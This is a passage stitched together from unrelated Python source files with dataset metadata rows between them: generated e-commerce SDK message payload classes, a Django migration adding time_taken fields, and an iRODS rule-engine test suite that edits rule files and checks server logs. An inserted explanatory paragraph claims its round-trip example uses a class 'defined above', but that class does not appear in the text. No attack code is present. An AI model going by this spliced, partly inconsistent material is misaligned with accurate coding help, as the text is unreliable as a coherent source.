return ProductUnpublishedMessagePayloadSchema().dump(self)
class ProductVariantAddedMessagePayload(MessagePayload):
variant: "ProductVariant"
staged: bool
def __init__(self, *, variant: "ProductVariant", staged: bool):
self.variant = variant
self.staged = staged
super().__init__(type="ProductVariantAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductVariantAddedMessagePayload":
from ._schemas.message import ProductVariantAddedMessagePayloadSchema
return ProductVariantAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductVariantAddedMessagePayloadSchema
return ProductVariantAddedMessagePayloadSchema().dump(self)
class ProductVariantDeletedMessagePayload(MessagePayload):
variant: "ProductVariant"
removed_image_urls: typing.List["str"]
def __init__(
self, *, variant: "ProductVariant", removed_image_urls: typing.List["str"]
):
self.variant = variant
self.removed_image_urls = removed_image_urls
super().__init__(type="ProductVariantDeleted")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductVariantDeletedMessagePayload":
from ._schemas.message import ProductVariantDeletedMessagePayloadSchema
return ProductVariantDeletedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductVariantDeletedMessagePayloadSchema
return ProductVariantDeletedMessagePayloadSchema().dump(self)
class ReviewCreatedMessagePayload(MessagePayload):
review: "Review"
def __init__(self, *, review: "Review"):
self.review = review
super().__init__(type="ReviewCreated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ReviewCreatedMessagePayload":
from ._schemas.message import ReviewCreatedMessagePayloadSchema
return ReviewCreatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ReviewCreatedMessagePayloadSchema
return ReviewCreatedMessagePayloadSchema().dump(self)
class ReviewRatingSetMessagePayload(MessagePayload):
old_rating: typing.Optional[float]
new_rating: typing.Optional[float]
included_in_statistics: bool
target: typing.Optional["Reference"]
def __init__(
self,
*,
old_rating: typing.Optional[float] = None,
new_rating: typing.Optional[float] = None,
included_in_statistics: bool,
target: typing.Optional["Reference"] = None
):
self.old_rating = old_rating
self.new_rating = new_rating
self.included_in_statistics = included_in_statistics
self.target = target
super().__init__(type="ReviewRatingSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ReviewRatingSetMessagePayload":
from ._schemas.message import ReviewRatingSetMessagePayloadSchema
return ReviewRatingSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ReviewRatingSetMessagePayloadSchema
return ReviewRatingSetMessagePayloadSchema().dump(self)
class ReviewStateTransitionMessagePayload(MessagePayload):
old_state: "StateReference"
new_state: "StateReference"
old_included_in_statistics: bool
new_included_in_statistics: bool
target: "Reference"
force: bool
def __init__(
self,
*,
old_state: "StateReference",
new_state: "StateReference",
old_included_in_statistics: bool,
new_included_in_statistics: bool,
target: "Reference",
force: bool
):
self.old_state = old_state
self.new_state = new_state
self.old_included_in_statistics = old_included_in_statistics
self.new_included_in_statistics = new_included_in_statistics
self.target = target
self.force = force
super().__init__(type="ReviewStateTransition")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ReviewStateTransitionMessagePayload":
from ._schemas.message import ReviewStateTransitionMessagePayloadSchema
return ReviewStateTransitionMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ReviewStateTransitionMessagePayloadSchema
return ReviewStateTransitionMessagePayloadSchema().dump(self)
class ShoppingListStoreSetMessagePayload(MessagePayload):
store: "StoreKeyReference"
def __init__(self, *, store: "StoreKeyReference"):
self.store = store
super().__init__(type="ShoppingListStoreSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ShoppingListStoreSetMessagePayload":
from ._schemas.message import ShoppingListStoreSetMessagePayloadSchema
return ShoppingListStoreSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ShoppingListStoreSetMessagePayloadSchema
return ShoppingListStoreSetMessagePayloadSchema().dump(self)
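Every payload class above follows the same pattern: a keyword-only constructor that fixes the discriminating `type`, a `serialize()` method that dumps through a lazily imported marshmallow schema, and a `deserialize()` classmethod that loads from a plain dict. A minimal round-trip sketch, using one of the classes defined above directly and assuming this module and its `_schemas.message` counterpart are importable; the literal field values are placeholders, not values from the source:
# Round trip one payload through its marshmallow schema (illustrative only).
payload = PaymentStatusInterfaceCodeSetMessagePayload(
    payment_id="example-payment-id",   # placeholder identifier
    interface_code="PAID",             # placeholder PSP status code
)
data = payload.serialize()             # plain dict produced by the schema
restored = PaymentStatusInterfaceCodeSetMessagePayload.deserialize(data)
assert restored.payment_id == payload.payment_id
assert restored.interface_code == payload.interface_code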
| 35.119186
| 88
| 0.683133
| 19,518
| 236,317
| 8.00456
| 0.030177
| 0.031895
| 0.052191
| 0.069588
| 0.877971
| 0.874175
| 0.87102
| 0.782223
| 0.778241
| 0.604258
| 0
| 0
| 0.235853
| 236,317
| 6,728
| 89
| 35.124405
| 0.865169
| 0.001968
| 0
| 0.817404
| 1
| 0
| 0.107864
| 0.067761
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084107
| false
| 0.004005
| 0.089751
| 0
| 0.343528
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
536618c76864a4f1142321161ed15d0dfc8b1fcd
| 2,029
|
py
|
Python
|
Questionnaire/migrations/0003_auto_20200720_1101.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
Questionnaire/migrations/0003_auto_20200720_1101.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
Questionnaire/migrations/0003_auto_20200720_1101.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.2 on 2020-07-20 11:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Questionnaire', '0002_auto_20200720_1100'),
]
operations = [
migrations.AddField(
model_name='userresponse_common_features_test_set1',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_common_features_test_set2',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_common_features_test_set3',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_common_features_test_set4',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_common_features_test_set5',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_test_set1',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_test_set2',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_test_set3',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_test_set4',
name='time_taken',
field=models.FloatField(default=None),
),
migrations.AddField(
model_name='userresponse_test_set5',
name='time_taken',
field=models.FloatField(default=None),
),
]
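The operations above add the same `time_taken` column to ten response tables. For orientation, a sketch of the model-side declaration each `AddField` corresponds to; the class name is inferred from `model_name='userresponse_test_set1'` and `null=True` is an assumption about the intended schema, since `FloatField(default=None)` on a NOT NULL column fails as soon as the default is actually written to the database:
from django.db import models

class UserResponse_Test_Set1(models.Model):  # name inferred from model_name; casing assumed
    # Field added by migration 0003; null=True assumed so a default of None can be stored.
    time_taken = models.FloatField(default=None, null=True)
Applying the migration is the usual `python manage.py migrate Questionnaire`, with the app name taken from the dependency on '0002_auto_20200720_1100'.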
| 31.703125
| 64
| 0.590931
| 189
| 2,029
| 6.063492
| 0.227513
| 0.157068
| 0.200698
| 0.235602
| 0.863874
| 0.863874
| 0.863874
| 0.863874
| 0.817627
| 0.817627
| 0
| 0.029181
| 0.307541
| 2,029
| 63
| 65
| 32.206349
| 0.786477
| 0.022178
| 0
| 0.701754
| 1
| 0
| 0.21998
| 0.162967
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.017544
| 0
| 0.070175
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
725b0ca5d88de89509a5bd2013a87016acb69d10
| 46,283
|
py
|
Python
|
tests/pydevtest/test_rulebase.py
|
iychoi/cyverse-irods
|
0070b8677a82e763f1d940ae6537b1c8839a628a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/pydevtest/test_rulebase.py
|
iychoi/cyverse-irods
|
0070b8677a82e763f1d940ae6537b1c8839a628a
|
[
"BSD-3-Clause"
] | 6
|
2019-12-02T18:17:44.000Z
|
2019-12-02T18:17:57.000Z
|
tests/pydevtest/test_rulebase.py
|
benlazarine/cyverse-irods
|
2bf9cfae4c3a1062ffe2af92b1f086ddc5fce025
|
[
"BSD-3-Clause"
] | 1
|
2019-12-02T05:40:13.000Z
|
2019-12-02T05:40:13.000Z
|
import sys
if sys.version_info >= (2, 7):
import unittest
else:
import unittest2 as unittest
import os
import socket
import time # remove once file hash fix is committed #2279
import lib
import copy
import inspect
import configuration
from resource_suite import ResourceBase
class Test_Rulebase(ResourceBase, unittest.TestCase):
def setUp(self):
super(Test_Rulebase, self).setUp()
def tearDown(self):
super(Test_Rulebase, self).tearDown()
def test_client_server_negotiation__2564(self):
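# Force a client/server negotiation mismatch: the client session is switched to
# CS_NEG_REFUSE while acPreConnect in core.re is set to answer CS_NEG_REQUIRE,
# so the subsequent `ils` is expected to fail with CLIENT_NEGOTIATION_ERROR.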
corefile = lib.get_core_re_dir() + "/core.re"
with lib.file_backed_up(corefile):
client_update = {
'irods_client_server_policy': 'CS_NEG_REFUSE'
}
session_env_backup = copy.deepcopy(self.admin.environment_file_contents)
self.admin.environment_file_contents.update(client_update)
time.sleep(2) # remove once file hash fix is committed #2279
lib.prepend_string_to_file('\nacPreConnect(*OUT) { *OUT="CS_NEG_REQUIRE"; }\n', corefile)
time.sleep(2) # remove once file hash fix is committed #2279
self.admin.assert_icommand( 'ils','STDERR_SINGLELINE','CLIENT_NEGOTIATION_ERROR')
self.admin.environment_file_contents = session_env_backup
def test_msiDataObjWrite__2795(self):
rule_file = "test_rule_file.r"
rule_string = """
test_msiDataObjWrite__2795 {
### write a string to a file in irods
msiDataObjCreate("*TEST_ROOT" ++ "/test_file.txt","null",*FD);
msiDataObjWrite(*FD,"this_is_a_test_string",*LEN);
msiDataObjClose(*FD,*Status);
}
INPUT *TEST_ROOT=\""""+self.admin.session_collection+"""\"
OUTPUT ruleExecOut
"""
with open(rule_file, 'w') as f:
f.write(rule_string)
test_file = self.admin.session_collection+'/test_file.txt'
self.admin.assert_icommand('irule -F ' + rule_file)
self.admin.assert_icommand('ils -l','STDOUT_SINGLELINE','test_file')
self.admin.assert_icommand('iget -f '+test_file)
with open("test_file.txt", 'r') as f:
file_contents = f.read()
assert( not file_contents.endswith('\0') )
def test_acPostProcForPut_replicate_to_multiple_resources(self):
# create new resources
hostname = socket.gethostname()
self.admin.assert_icommand("iadmin mkresc r1 unixfilesystem " + hostname + ":/tmp/irods/r1", 'STDOUT_SINGLELINE', "Creating")
self.admin.assert_icommand("iadmin mkresc r2 unixfilesystem " + hostname + ":/tmp/irods/r2", 'STDOUT_SINGLELINE', "Creating")
corefile = os.path.join(lib.get_core_re_dir(), 'core.re')
with lib.file_backed_up(corefile):
time.sleep(2) # remove once file hash fix is committed #2279
lib.prepend_string_to_file('\nacPostProcForPut { replicateMultiple( \"r1,r2\" ); }\n', corefile)
time.sleep(2) # remove once file hash fix is committed #2279
# add new rule to end of core.re
newrule = """
# multiple replication rule
replicateMultiple(*destRgStr) {
*destRgList = split(*destRgStr, ',');
writeLine("serverLog", " acPostProcForPut multiple replicate $objPath $filePath -> *destRgStr");
foreach (*destRg in *destRgList) {
writeLine("serverLog", " acPostProcForPut replicate $objPath $filePath -> *destRg");
*e = errorcode(msiSysReplDataObj(*destRg,"null"));
if (*e != 0) {
if(*e == -808000) {
writeLine("serverLog", "$objPath cannot be found");
$status = 0;
succeed;
} else {
fail(*e);
}
}
}
}
"""
time.sleep(2) # remove once file hash fix is committed #2279
lib.prepend_string_to_file(newrule, corefile)
time.sleep(2) # remove once file hash fix is committed #2279
# put data
tfile = "rulebasetestfile"
lib.touch(tfile)
self.admin.assert_icommand(['iput', tfile])
# check replicas
self.admin.assert_icommand(['ils', '-L', tfile], 'STDOUT_MULTILINE', [' demoResc ', ' r1 ', ' r2 '])
# clean up and remove new resources
self.admin.assert_icommand("irm -rf " + tfile)
self.admin.assert_icommand("iadmin rmresc r1")
self.admin.assert_icommand("iadmin rmresc r2")
time.sleep(2) # remove once file hash fix is committed #2279
def test_dynamic_pep_with_rscomm_usage(self):
# save original core.re
corefile = os.path.join(lib.get_core_re_dir(), "core.re")
origcorefile = os.path.join(lib.get_core_re_dir(), "core.re.orig")
os.system("cp " + corefile + " " + origcorefile)
# add dynamic PEP with rscomm usage
time.sleep(1) # remove once file hash fix is committed #2279
os.system('''echo "pep_resource_open_pre(*OUT) { msiGetSystemTime( *junk, '' ); }" >> ''' + corefile)
time.sleep(1) # remove once file hash fix is committed #2279
# check rei functioning
self.admin.assert_icommand("iget " + self.testfile + " - ", 'STDOUT_SINGLELINE', self.testfile)
# restore core.re
time.sleep(1) # remove once file hash fix is committed #2279
os.system("cp " + origcorefile + " " + corefile)
time.sleep(1) # remove once file hash fix is committed #2279
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads re server log')
def test_rulebase_update__2585(self):
rule_file = 'my_rule.r'
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
my_rule = """
my_rule {
delay("<PLUSET>1s</PLUSET>") {
do_some_stuff();
}
}
INPUT null
OUTPUT ruleExecOut
"""
with open(rule_file, 'w') as f:
f.write(my_rule)
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
with lib.file_backed_up(server_config_filename):
# write new rule file to config dir
test_rule = 'do_some_stuff() { writeLine( "serverLog", "TEST_STRING_TO_FIND_1_2585" ); }'
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
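# After this call server_config.json should contain, alongside its existing keys,
# a rulebase list along the lines of:
#   "re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
# (exact merge semantics are those of the test helper update_json_file_from_dict).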
lib.restart_irods_server()
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('re')
self.admin.assert_icommand('irule -F ' + rule_file)
time.sleep(35) # wait for test to fire
assert lib.count_occurrences_of_string_in_log('re', 'TEST_STRING_TO_FIND_1_2585', start_index=initial_log_size)
# repave rule with new string
test_rule = 'do_some_stuff() { writeLine( "serverLog", "TEST_STRING_TO_FIND_2_2585" ); }'
os.unlink(test_re)
with open(test_re, 'w') as f:
f.write(test_rule)
time.sleep(35) # wait for delay rule engine to wake
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('re')
self.admin.assert_icommand('irule -F ' + rule_file)
time.sleep(35) # wait for test to fire
assert lib.count_occurrences_of_string_in_log('re', 'TEST_STRING_TO_FIND_2_2585', start_index=initial_log_size)
# cleanup
os.unlink(test_re)
os.unlink(rule_file)
lib.restart_irods_server()
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acPostProcForPut__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
sesh = self.user0
testfile = self.testfile
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# iput test file to trigger PEP
sesh.assert_icommand('iput -f {testfile}'.format(**locals()))
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
sesh.run_icommand('irm -f {testfile}'.format(**locals()))
os.unlink(test_re)
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acDataDeletePolicy__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
sesh = self.user0
testfile = self.testfile
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# iput test file
sesh.assert_icommand('iput -f {testfile}'.format(**locals()))
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# delete test file to trigger PEP
sesh.assert_icommand('irm -f {testfile}'.format(**locals()))
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
os.unlink(test_re)
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acPostProcForDelete__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
sesh = self.user0
testfile = self.testfile
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# iput test file
sesh.assert_icommand('iput -f {testfile}'.format(**locals()))
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# delete test file to trigger PEP
sesh.assert_icommand('irm -f {testfile}'.format(**locals()))
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
os.unlink(test_re)
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acSetChkFilePathPerm__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# test file for ireg
testfile = os.path.join(lib.get_irods_top_level_dir(), 'VERSION.json')
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
sesh = self.user0
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# ireg test file to trigger PEP
target_obj = os.path.join(sesh.home_collection, os.path.basename(testfile))
sesh.assert_icommand('ireg {testfile} {target_obj}'.format(**locals()), 'STDERR_SINGLELINE', 'PATH_REG_NOT_ALLOWED')
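# Editorial note: the unprivileged user's ireg is expected to fail with PATH_REG_NOT_ALLOWED,
# but acSetChkFilePathPerm has already fired by then, so the test verifies the server log
# rather than a successful registration.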
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
os.unlink(test_re)
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acPostProcForFilePathReg__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
# use admin to be allowed to register stuff
sesh = self.admin
# test file for ireg
username = sesh.username
resc_vault_path = lib.get_vault_path(sesh)
testfile = '{resc_vault_path}/home/{username}/foo.txt'.format(**locals())
open(testfile, 'a').close()
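# Editorial note: this test runs as rodsadmin (see above) and creates the physical file inside
# the resource vault path, so the ireg below is allowed to succeed and acPostProcForFilePathReg
# can fire.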
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
